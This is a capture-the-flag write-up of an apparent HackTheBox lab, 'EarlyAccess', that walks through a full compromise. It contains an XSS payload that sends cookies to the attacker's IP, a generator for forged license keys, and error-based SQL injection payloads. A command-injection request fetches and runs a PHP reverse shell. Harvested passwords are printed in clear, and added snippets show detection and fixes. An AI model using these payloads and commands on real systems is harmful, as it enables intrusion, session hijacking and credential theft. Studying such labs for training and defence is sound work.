1. IP Address

# Machine Address
10.10.11.110

# Local Address
10.10.14.12

2. Nmap

CLI:

nmap -sV -sC -oA nmap/early_access 10.10.11.110

Out:

Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-01 02:20 EST
Nmap scan report for 10.10.11.110
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 e4:66:28:8e:d0:bd:f3:1d:f1:8d:44:e9:14:1d:9c:64 (RSA)
|   256 b3:a8:f4:49:7a:03:79:d3:5a:13:94:24:9b:6a:d1:bd (ECDSA)
|_  256 e9:aa:ae:59:4a:37:49:a6:5a:2a:32:1d:79:26:ed:bb (ED25519)
80/tcp  open  http     Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to https://earlyaccess.htb/
443/tcp open  ssl/http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: EarlyAccess
| ssl-cert: Subject: commonName=earlyaccess.htb/organizationName=EarlyAccess Studios/stateOrProvinceName=Vienna/countryName=AT
| Not valid before: 2021-08-18T14:46:57
|_Not valid after:  2022-08-18T14:46:57
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: Host: 172.18.0.102; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.44 seconds

3. XSS

XSS payload in the change-username field:

username:

<script>var i=new Image;i.src="https://10.10.14.7/443"+document.cookie;</script>

Start the HTTPS listener on the local VM:

# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
#    openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit https://<bind address>:<port> (443 below, not 4443 as in the original post)

import http.server
import ssl

# Bind to the listening VM's address on 443, matching the URL used in the XSS payload.
server_address = ('10.10.14.7', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)

# ssl.wrap_socket() was deprecated in Python 3.7 and removed in 3.12; an SSLContext
# with the server-side protocol does the same job on current interpreters.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="server.pem", keyfile="key.pem")
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

python3 listener:

"GET /443XSRF-TOKEN=eyJpdiI6InBNMm9FV3Frd1hqOVJSem1BbjFHckE9PSIsInZhbHVlIjoid05TbWpTRHowTWRKemlvdjZHaytITTFNU2xnckFmK2dOTWhHc0grdlRWbU9SK280V0hydGdVMjZjUjI5OFFtekVabWRPZnlJTWxEK0hLd1hJa1pIb1RGcTUzQ0pzOVpNYmw1RHdIZjJRY09peFV6K3JBS1dPYjVSS3M3OVBieC8iLCJtYWMiOiIyMTFiNzIzYjBlNWQ3M2E5NzliYTdmNzJlMmE2MTNmZDAxZTAxN2Q5YzJkNWU2OGFlNjYyYTVlYjYzYzQ5NzM1In0%3D;%20earlyaccess_session=eyJpdiI6IjU2ekxPNmNDdkdna1BnQkh4YkFlcUE9PSIsInZhbHVlIjoiSld1SXhmUkh0dzZUemREYU1uejZnU2ZHZVRBakJrbTE2bStvd2M1dUZqdFNza01vdzExM0IvdHJSdE53Ym90R1FqMXhwT0piQ3RlcFA4Mi9FNkNSc1kxTEQvUUMzZFl6ak9CemZtU0kvZUY0cDJXVHpXNTh6MFhOZmZVZmJ6ZlYiLCJtYWMiOiJjODI4NTc2NDE1MmJmNmQwMDE4ZmE5MTJlNWRhYzBiZGM1Y2IyMTI2NmVhYmYxODY4YzkwZjEwMDk2Y2UwYzE3In0%3D HTTP/1.1" 404 -

XSRF-TOKEN

eyJpdiI6InBNMm9FV3Frd1hqOVJSem1BbjFHckE9PSIsInZhbHVlIjoid05TbWpTRHowTWRKemlvdjZHaytITTFNU2xnckFmK2dOTWhHc0grdlRWbU9SK280V0hydGdVMjZjUjI5OFFtekVabWRPZnlJTWxEK0hLd1hJa1pIb1RGcTUzQ0pzOVpNYmw1RHdIZjJRY09peFV6K3JBS1dPYjVSS3M3OVBieC8iLCJtYWMiOiIyMTFiNzIzYjBlNWQ3M2E5NzliYTdmNzJlMmE2MTNmZDAxZTAxN2Q5YzJkNWU2OGFlNjYyYTVlYjYzYzQ5NzM1In0%3D

earlyaccess_session:

eyJpdiI6IjU2ekxPNmNDdkdna1BnQkh4YkFlcUE9PSIsInZhbHVlIjoiSld1SXhmUkh0dzZUemREYU1uejZnU2ZHZVRBakJrbTE2bStvd2M1dUZqdFNza01vdzExM0IvdHJSdE53Ym90R1FqMXhwT0piQ3RlcFA4Mi9FNkNSc1kxTEQvUUMzZFl6ak9CemZtU0kvZUY0cDJXVHpXNTh6MFhOZmZVZmJ6ZlYiLCJtYWMiOiJjODI4NTc2NDE1MmJmNmQwMDE4ZmE5MTJlNWRhYzBiZGM1Y2IyMTI2NmVhYmYxODY4YzkwZjEwMDk2Y2UwYzE3In0%3D
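As an added example (not part of the original write-up), the two captured cookies can be unpacked to see what was actually stolen: both are Laravel-style encrypted-cookie envelopes, base64 of {"iv","value","mac"}. The MAC construction below (HMAC-SHA256 over the base64 iv and ciphertext, keyed with APP_KEY) is modelled on Laravel's Encrypter and the APP_KEY is constructed, so the captured values are only checked for structure; the replay-versus-tamper part shows why encrypting the cookie does not stop a stolen copy from being reused, which makes the session cookie being readable from document.cookie (no HttpOnly) the actual defect.

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import unquote

# The two cookie values exactly as the listener logged them (URL-encoded, '%3D' is '=').
CAPTURED = {
    "XSRF-TOKEN": "eyJpdiI6InBNMm9FV3Frd1hqOVJSem1BbjFHckE9PSIsInZhbHVlIjoid05TbWpTRHowTWRKemlvdjZHaytITTFNU2xnckFmK2dOTWhHc0grdlRWbU9SK280V0hydGdVMjZjUjI5OFFtekVabWRPZnlJTWxEK0hLd1hJa1pIb1RGcTUzQ0pzOVpNYmw1RHdIZjJRY09peFV6K3JBS1dPYjVSS3M3OVBieC8iLCJtYWMiOiIyMTFiNzIzYjBlNWQ3M2E5NzliYTdmNzJlMmE2MTNmZDAxZTAxN2Q5YzJkNWU2OGFlNjYyYTVlYjYzYzQ5NzM1In0%3D",
    "earlyaccess_session": "eyJpdiI6IjU2ekxPNmNDdkdna1BnQkh4YkFlcUE9PSIsInZhbHVlIjoiSld1SXhmUkh0dzZUemREYU1uejZnU2ZHZVRBakJrbTE2bStvd2M1dUZqdFNza01vdzExM0IvdHJSdE53Ym90R1FqMXhwT0piQ3RlcFA4Mi9FNkNSc1kxTEQvUUMzZFl6ak9CemZtU0kvZUY0cDJXVHpXNTh6MFhOZmZVZmJ6ZlYiLCJtYWMiOiJjODI4NTc2NDE1MmJmNmQwMDE4ZmE5MTJlNWRhYzBiZGM1Y2IyMTI2NmVhYmYxODY4YzkwZjEwMDk2Y2UwYzE3In0%3D",
}


def decode_cookie(raw: str) -> dict:
    """URL-decode, then base64-decode, the outer envelope into its {"iv","value","mac"} parts."""
    return json.loads(base64.b64decode(unquote(raw)))


def captured_summary() -> dict:
    """name -> (sorted keys, IV length in bytes, MAC length in hex chars) for the captured cookies."""
    out = {}
    for name, raw in CAPTURED.items():
        c = decode_cookie(raw)
        out[name] = (sorted(c), len(base64.b64decode(c["iv"])), len(c["mac"]))
    return out


def laravel_mac(app_key: bytes, iv_b64: str, value_b64: str) -> str:
    """HMAC-SHA256 over the base64 IV followed by the base64 ciphertext, keyed with APP_KEY
    (modelled on Laravel's Encrypter; an assumption, not taken from the box)."""
    return hmac.new(app_key, (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()


def mac_ok(app_key: bytes, cookie: dict) -> bool:
    """Constant-time comparison of the recomputed MAC with the one in the envelope."""
    return hmac.compare_digest(laravel_mac(app_key, cookie["iv"], cookie["value"]), cookie["mac"])


def make_cookie(app_key: bytes, iv: bytes, ciphertext: bytes) -> str:
    """Build an envelope the way the server would. The ciphertext is treated as opaque
    bytes here; no AES is needed to show the integrity property."""
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    env = {"iv": iv_b64, "value": value_b64, "mac": laravel_mac(app_key, iv_b64, value_b64)}
    return base64.b64encode(json.dumps(env).encode()).decode()


def replay_vs_tamper() -> tuple:
    """(stolen_verifies, tampered_verifies) under a constructed APP_KEY: the MAC binds the
    ciphertext to the key, not to the browser, so a copied cookie is accepted unchanged,
    while a single flipped ciphertext byte is rejected."""
    app_key = b"constructed-app-key-not-the-real-one"   # constructed; the real APP_KEY is unknown
    stolen = decode_cookie(make_cookie(app_key, bytes(range(16)), b"\x41" * 32))
    tampered = dict(stolen)
    ct = bytearray(base64.b64decode(tampered["value"]))
    ct[0] ^= 0xFF
    tampered["value"] = base64.b64encode(bytes(ct)).decode()
    return mac_ok(app_key, stolen), mac_ok(app_key, tampered)
```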

4. Exploitation

After swapping in the stolen cookie, the admin panel appears and the http://dev.earlyaccess.htb/ subdomain becomes visible.

backup.zip contains validate.py, which belongs to the Generate Key feature. Key layout: group1-group2-group3-group4-group5

#!/usr/bin/env python3
import sys
from re import match

class Key:
    key = ""
    magic_value = "XP" # Static (same on API)
    magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)

    def __init__(self, key:str, magic_num:int=346):
        self.key = key
        if magic_num != 0:
            self.magic_num = magic_num

    @staticmethod
    def info() -> str:
        return f"""
        # Game-Key validator #

        Can be used to quickly verify a user's game key, when the API is down (again).

        Keys look like the following:
        AAAAA-BBBBB-CCCC1-DDDDD-1234

        Usage: {sys.argv[0]} <game-key>"""

    def valid_format(self) -> bool:
        return bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$", self.key))

    def calc_cs(self) -> int:
        gs = self.key.split('-')[:-1]
        return sum([sum(bytearray(g.encode())) for g in gs])

    def g1_valid(self) -> bool:
        g1 = self.key.split('-')[0]
        r = [(ord(v)<<i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
        if r != [221, 81, 145]:
            return False
        for v in g1[3:]:
            try:
                int(v)
            except:
                return False
        return len(set(g1)) == len(g1)

    def g2_valid(self) -> bool:
        g2 = self.key.split('-')[1]
        p1 = g2[::2]
        p2 = g2[1::2]
        return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))

    def g3_valid(self) -> bool:
        # TODO: Add mechanism to sync magic_num with API
        g3 = self.key.split('-')[2]
        if g3[0:2] == self.magic_value:
            return sum(bytearray(g3.encode())) == self.magic_num
        else:
            return False

    def g4_valid(self) -> bool:
        return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0], self.key.split('-')[3])] == [12, 4, 20, 117, 0]

    def cs_valid(self) -> bool:
        cs = int(self.key.split('-')[-1])
        return self.calc_cs() == cs

    def check(self) -> bool:
        if not self.valid_format():
            print('Key format invalid!')
            return False
        if not self.g1_valid():
            return False
        if not self.g2_valid():
            return False
        if not self.g3_valid():
            return False
        if not self.g4_valid():
            return False
        if not self.cs_valid():
            print('[Critical] Checksum verification failed!')
            return False
        return True

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(Key.info())
        sys.exit(-1)
    input = sys.argv[1]
    validator = Key(input)
    if validator.check():
        print(f"Entered key is valid!")
    else:
        print(f"Entered key is invalid!") 

Note: Python's ord() takes a one-character string and returns its Unicode code point as an integer; for the ASCII characters used in these keys that is simply the byte value (e.g. ord('A') == 65).

#!/usr/bin/env python3
import string

AtoZ = list(string.ascii_uppercase)
digits = list(string.digits)

all_strings = AtoZ + digits
print(all_strings)

i = 2
for v in all_strings:
    r = [(ord(v) << i + 1) % 256 ^ ord(v)]
    if r[0] == int(145):
        print(v)
    print(v, "<-->", sum(bytearray(v.encode())))
['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
A <--> 65
B <--> 66
C <--> 67
D <--> 68
E <--> 69
F <--> 70
G <--> 71
H <--> 72
I <--> 73
J <--> 74
K <--> 75
L <--> 76
M <--> 77
N <--> 78
O <--> 79
P <--> 80
Q <--> 81
R <--> 82
S <--> 83
T <--> 84
U <--> 85
V <--> 86
W <--> 87
X <--> 88
Y
Y <--> 89
Z <--> 90
0 <--> 48
1 <--> 49
2 <--> 50
3 <--> 51
4 <--> 52
5 <--> 53
6 <--> 54
7 <--> 55
8 <--> 56
9 <--> 57

magic_num = 346. "XP" contributes 88 + 80 = 168, so the remaining three characters of group 3 must sum to 346 - 168 = 178.

min = 178
ALPHABET1 = "ABCDEFGHJKLMNOPQSTYUWZ"
NUM = "0123456789"
# Group 3 is "XP" plus two letters and a digit; its byte sum must equal the API's current
# magic_num, which is unknown, so print one candidate per byte sum starting at 178
# (346 - 168) and raise the threshold after each print so the sums climb step by step.
for x in ALPHABET1:
    for y in ALPHABET1:
        for z in NUM:
            res = int(ord(x)) + int(ord(y)) + int(ord(z))
            if res >= min:
                group = "XP" + x + y + z
                gs = ["KEY19", "1A1R1"]   # group 1 and group 2, already known to pass
                gs.append(group)
                gs.append("GAMD9")        # group 4, derived from "KEY19"
                lastgrp = sum([sum(bytearray(g.encode())) for g in gs])   # checksum over groups 1-4
                print("KEY19-1A1R1-" + group + "-GAMD9-" + str(lastgrp))
                min = min + 1
KEY19-1A1R1-XPAA0-GAMD9-1317
KEY19-1A1R1-XPAA1-GAMD9-1318
KEY19-1A1R1-XPAA2-GAMD9-1319
KEY19-1A1R1-XPAA3-GAMD9-1320
KEY19-1A1R1-XPAA4-GAMD9-1321
KEY19-1A1R1-XPAA5-GAMD9-1322
KEY19-1A1R1-XPAA6-GAMD9-1323
KEY19-1A1R1-XPAA7-GAMD9-1324
KEY19-1A1R1-XPAA8-GAMD9-1325
KEY19-1A1R1-XPAA9-GAMD9-1326
KEY19-1A1R1-XPAB9-GAMD9-1327
KEY19-1A1R1-XPAC9-GAMD9-1328
KEY19-1A1R1-XPAD9-GAMD9-1329
KEY19-1A1R1-XPAE9-GAMD9-1330
KEY19-1A1R1-XPAF9-GAMD9-1331
KEY19-1A1R1-XPAG9-GAMD9-1332
KEY19-1A1R1-XPAH9-GAMD9-1333
KEY19-1A1R1-XPAJ8-GAMD9-1334
KEY19-1A1R1-XPAJ9-GAMD9-1335
KEY19-1A1R1-XPAK9-GAMD9-1336
KEY19-1A1R1-XPAL9-GAMD9-1337
KEY19-1A1R1-XPAM9-GAMD9-1338
KEY19-1A1R1-XPAN9-GAMD9-1339
KEY19-1A1R1-XPAO9-GAMD9-1340
KEY19-1A1R1-XPAP9-GAMD9-1341
KEY19-1A1R1-XPAQ9-GAMD9-1342
KEY19-1A1R1-XPAS8-GAMD9-1343
KEY19-1A1R1-XPAS9-GAMD9-1344
KEY19-1A1R1-XPAT9-GAMD9-1345
KEY19-1A1R1-XPAY5-GAMD9-1346
KEY19-1A1R1-XPAY6-GAMD9-1347
KEY19-1A1R1-XPAY7-GAMD9-1348
KEY19-1A1R1-XPAY8-GAMD9-1349
KEY19-1A1R1-XPAY9-GAMD9-1350
KEY19-1A1R1-XPAZ9-GAMD9-1351
KEY19-1A1R1-XPBZ9-GAMD9-1352
KEY19-1A1R1-XPCZ9-GAMD9-1353
KEY19-1A1R1-XPDZ9-GAMD9-1354
KEY19-1A1R1-XPEZ9-GAMD9-1355
KEY19-1A1R1-XPFZ9-GAMD9-1356
KEY19-1A1R1-XPGZ9-GAMD9-1357
KEY19-1A1R1-XPHZ9-GAMD9-1358
KEY19-1A1R1-XPJY9-GAMD9-1359
KEY19-1A1R1-XPJZ9-GAMD9-1360
KEY19-1A1R1-XPKZ9-GAMD9-1361
KEY19-1A1R1-XPLZ9-GAMD9-1362
KEY19-1A1R1-XPMZ9-GAMD9-1363
KEY19-1A1R1-XPNZ9-GAMD9-1364
KEY19-1A1R1-XPOZ9-GAMD9-1365
KEY19-1A1R1-XPPZ9-GAMD9-1366
KEY19-1A1R1-XPQZ9-GAMD9-1367
KEY19-1A1R1-XPSY9-GAMD9-1368
KEY19-1A1R1-XPSZ9-GAMD9-1369
KEY19-1A1R1-XPTZ9-GAMD9-1370
KEY19-1A1R1-XPYY6-GAMD9-1371
KEY19-1A1R1-XPYY7-GAMD9-1372
KEY19-1A1R1-XPYY8-GAMD9-1373
KEY19-1A1R1-XPYY9-GAMD9-1374
KEY19-1A1R1-XPYZ9-GAMD9-1375
KEY19-1A1R1-XPZZ9-GAMD9-1376
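The exploration above can be done for every group at once. Added example, not the box's validate.py and not the author's script: each constraint in validate.py is inverted directly and a compact restatement of the checks confirms the result. The defensive point is that every check depends only on constants shipped inside the validator (the g1 target list, the g4 xor list, "XP" and magic_num), so the file is itself a key generator; only magic_num rotates, and it is a single byte sum over three characters, which is why a server-side secret such as an HMAC over the key body is needed instead.

```python
import re
import string
from itertools import product

ALNUM = string.ascii_uppercase + string.digits
G1_TARGET = [221, 81, 145]       # the list g1_valid() compares against
G4_XOR = [12, 4, 20, 117, 0]     # the list g4_valid() compares against
MAGIC_VALUE = "XP"               # magic_value, fixed prefix of group 3
KEY_RE = re.compile(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$")


def byte_sum(s: str) -> int:
    return sum(s.encode())


def g1_transform(c: str, i: int) -> int:
    """The per-position function g1_valid() applies to the first three characters."""
    return (ord(c) << (i + 1)) % 256 ^ ord(c)


def solve_g1(suffix: str = "19") -> str:
    """Invert g1 position by position (36 candidates each), then append two distinct
    digits so the 'all characters unique' check still passes."""
    head = ""
    for i, target in enumerate(G1_TARGET):
        hits = [c for c in ALNUM if g1_transform(c, i) == target]
        if not hits:
            raise ValueError(f"no character maps to {target} at position {i}")
        head += hits[0]
    g1 = head + suffix
    if not (len(suffix) == 2 and suffix.isdigit() and len(set(g1)) == 5):
        raise ValueError("suffix must be two distinct digits not already in g1")
    return g1


def solve_g2() -> str:
    """g2 needs byte_sum(even positions) == byte_sum(odd positions). Index every
    3-char even-position string by its sum, then take the first 2-char odd-position
    pair whose sum is available and interleave the two."""
    by_sum = {}
    for t in product(ALNUM, repeat=3):
        by_sum.setdefault(byte_sum("".join(t)), "".join(t))
    for p in product(ALNUM, repeat=2):
        p2 = "".join(p)
        p1 = by_sum.get(byte_sum(p2))
        if p1:
            return p1[0] + p2[0] + p1[1] + p2[1] + p1[2]
    raise ValueError("no balanced g2 found")


def solve_g3(magic_num: int) -> str:
    """g3 = "XP" + two letters + one digit (the regex requires [A-Z]{4}[0-9]) whose
    bytes, together with "XP" (168), sum to magic_num."""
    need = magic_num - byte_sum(MAGIC_VALUE)
    for t in product(string.ascii_uppercase, string.ascii_uppercase, string.digits):
        if byte_sum("".join(t)) == need:
            return MAGIC_VALUE + "".join(t)
    raise ValueError(f"no letter-letter-digit tail sums to {need}")


def solve_g4(g1: str) -> str:
    """g4 is g1 xored position-wise with G4_XOR; it must stay inside [A-Z0-9]."""
    g4 = "".join(chr(ord(c) ^ x) for c, x in zip(g1, G4_XOR))
    if any(c not in ALNUM for c in g4):
        raise ValueError("this g1 suffix xors outside [A-Z0-9]; choose other digits")
    return g4


def build_key(magic_num: int) -> str:
    """Assemble all four groups for a given magic_num and append the byte-sum checksum."""
    g1 = solve_g1()
    groups = [g1, solve_g2(), solve_g3(magic_num), solve_g4(g1)]
    return "-".join(groups + [str(sum(map(byte_sum, groups)))])


def verify(key: str, magic_num: int) -> bool:
    """Compact restatement of validate.py's checks, to confirm the result independently."""
    if not KEY_RE.match(key):
        return False
    g1, g2, g3, g4, cs = key.split("-")
    return all([
        [g1_transform(c, i) for i, c in enumerate(g1[:3])] == G1_TARGET,
        g1[3:].isdigit() and len(set(g1)) == len(g1),
        byte_sum(g2[::2]) == byte_sum(g2[1::2]),
        g3[:2] == MAGIC_VALUE and byte_sum(g3) == magic_num,
        [ord(a) ^ ord(b) for a, b in zip(g1, g4)] == G4_XOR,
        byte_sum(g1 + g2 + g3 + g4) == int(cs),
    ])
```

The author's accepted key KEY19-1A1R1-XPAQ9-GAMD9-1342 passes verify() only with magic_num 371 (the byte sum of "XPAQ9"), so that is the value the API was using at the time rather than the 346 hard-coded in the backup.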

Submit each of the candidate keys above to the validator, then go to the dev. subdomain. The SQL injection starts from this part.

This one works at the moment:

KEY19-1A1R1-XPAQ9-GAMD9-1342

4.1 SQL Injection

Try changing the username of a user registered on both game and earlyaccess from the profile section.

ca4mi') and updatexml(1,concat(0x7e,(@@version),0x7e),1) #

Result (@Scoreboard):

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~8.0.25~' 

sql injection #1:

ca4mi') and updatexml(1,make_set(3,'',(select table_name from information_schema.tables where table_schema=database() limit 2,1)),1) #

Result:

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ',users' 

sql injection #2:

jade') and updatexml(1,make_set(3,'',(select column_name from information_schema.columns where table_name='users' limit 1,1)),1) #

Result:

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ',email' 

sql injection #3:

ca4mi') and updatexml(1,make_set(3,'',(select column_name from information_schema.columns where table_name='users' limit 5,1)),1) #

Result:

SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ',password' 

Continuing the SQL injection this way, pull the admin@earlyaccess.htb user's password from the database, crack the hash, log in to dev.earlyaccess.htb as admin with that password, and start a listener for the hash.php part.
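Added example, not from the write-up: the first part flags the error-based pattern used above in form input and pulls the disclosed value out of the XPATH error lines the application returned; the second part is the fix, a parameterised UPDATE, shown with sqlite3 so it runs offline (the target ran MySQL 8.0.25 behind PDO, but the placeholder principle is identical). The sample inputs and log lines are constructed from the payloads and results above plus one benign entry each.

```python
import re
import sqlite3

# Signatures for the error-based technique seen on this page; matched case-insensitively.
SIGNATURES = {
    "quote_paren_breakout": r"'\)\s*(and|or)\b",
    "xml_error_function": r"\b(updatexml|extractvalue)\s*\(",
    "make_set": r"\bmake_set\s*\(",
    "schema_probe": r"\binformation_schema\.",
    "trailing_comment": r"(#|--\s)\s*$",
}
ERROR_RE = re.compile(r"XPATH syntax error: '([^']*)'")


def score_input(value: str) -> list:
    """Names of the signatures matched by one form field value."""
    return [name for name, pat in SIGNATURES.items() if re.search(pat, value, re.IGNORECASE)]


def leaked_from_error(line: str):
    """Value the database error disclosed, or None if the line is not an XPATH error.
    Both the concat() and the make_set() variant pad the value with '~' or ','."""
    m = ERROR_RE.search(line)
    return m.group(1).strip("~,") if m else None


def scan_error_log(lines) -> list:
    """Every value disclosed across a batch of application error lines, in order."""
    return [v for v in map(leaked_from_error, lines) if v is not None]


def safe_update_username(conn, user_id: int, new_name: str) -> str:
    """Parameterised UPDATE: the value travels separately from the SQL text, so a payload
    becomes an odd-looking username instead of extra SQL. Returns the stored name."""
    conn.execute("UPDATE users SET name = ? WHERE id = ?", (new_name, user_id))
    return conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()[0]


def demo_parameterised() -> tuple:
    """(stored_name, row_count) after renaming a user to the page's first payload."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'ca4mi', 'ca4mi@example.invalid')")
    stored = safe_update_username(conn, 1, SAMPLE_INPUTS[1])
    count = conn.execute("SELECT count(*) FROM users").fetchone()[0]
    return stored, count


# Constructed samples: a benign username plus the three payloads from the write-up.
SAMPLE_INPUTS = [
    "ca4mi",
    "ca4mi') and updatexml(1,concat(0x7e,(@@version),0x7e),1) #",
    "ca4mi') and updatexml(1,make_set(3,'',(select table_name from information_schema.tables where table_schema=database() limit 2,1)),1) #",
    "jade') and updatexml(1,make_set(3,'',(select column_name from information_schema.columns where table_name='users' limit 1,1)),1) #",
]
# Constructed log batch: three error lines from the write-up and one unrelated PDO error.
SAMPLE_ERRORS = [
    "SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~8.0.25~'",
    "SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ',users'",
    "SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ',password'",
    "SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry 'ca4mi' for key 'users.name'",
]
```

Alerting on the "XPATH syntax error" string in application logs catches this technique regardless of the payload wording, and suppressing driver errors in responses removes the channel it relies on.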

Download the reverse shell from https://github.com/pentestmonkey/php-reverse-shell, change the ip and port to the local VM, and trigger the action in hash.php as shown below. Start http.server and nc on the local VM.

POST /actions/hash.php HTTP/1.1
Host: dev.earlyaccess.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://dev.earlyaccess.htb
DNT: 1
Connection: close
Referer: http://dev.earlyaccess.htb/home.php?tool=hashing
Cookie: PHPSESSID=079a3696c6388d0aa3a74e9ed793e559
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

action=hash&hash_function=exec&password=wget http://10.10.14.7:8000/php-reverse-shell.php -O /tmp/1.php;php /tmp/1.php&debug=1

4.2 Shell stabilization:

python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

stty raw -echo

fg [enter enter] brings us back into nc:

export TERM=xterm
su -l www-adm

4.3 linpeas

[+] Finding passwords inside key folders (limit 70) - no PHP files  
bash: line 2185: printf: `?': invalid format character  
/home/www-adm/.wgetrc:password=s3CuR3_API_PW!

[+] Networks and neighbours  
Iface	Destination	Gateway 	Flags	RefCnt	Use	Metric	Mask		MTU	Window	IRTT  
eth0	00000000	010012AC	0003	0	0	0	00000000	000  
eth0	000012AC	00000000	0001	0	0	0	0000FFFF	000  
IP address       HW type     Flags       HW address            Mask     Device  
172.18.0.2       0x1         0x2         02:42:ac:12:00:02     *        eth0  
172.18.0.100     0x1         0x2         02:42:ac:12:00:64     *        eth0  
172.18.0.1       0x1         0x2         02:42:b1:d2:79:25     *        eth0  
172.18.0.101     0x1         0x2         02:42:ac:12:00:65     *        eth0
nc -v -z -n 172.18.0.1 1-65535
(UNKNOWN) [172.18.0.1] 443 (https) open
(UNKNOWN) [172.18.0.1] 80 (http) open
(UNKNOWN) [172.18.0.1] 22 (ssh) open
curl -u 'api:s3CuR3_API_PW!' http://172.18.0.101:5000/check_db
"Env":["MYSQL_DATABASE=db","MYSQL_USER=drew","MYSQL_PASSWORD=drew","MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
ssh drew@10.10.11.110
password: XeoNu86JTznxMCQuGHrGutF3Csq5

user.txt

2d27000*********

5. Enumeration

ssh drew@10.10.11.110
password: XeoNu86JTznxMCQuGHrGutF3Csq5

sudo -l:

drew@earlyaccess:~$ sudo -l
-bash: sudo: command not found

logs:

[+] PATH  
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses  
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games  
New path exported: /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/sbin:/usr/sbin:/sbin

/etc/passwd:

cat: /etc/passwod: No such file or directory
drew@earlyaccess:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
drew:x:1000:1000:drew:/home/drew:/bin/bash
game-adm:x:1001:1001::/home/game-adm:/bin/bash
[+] Networks and neighbours  
Kernel IP routing table  
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface  
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens160  
10.10.10.0      0.0.0.0         255.255.254.0   U     0      0        0 ens160  
172.17.0.0      0.0.0.0         255.255.0.0     U     0      0        0 docker0  
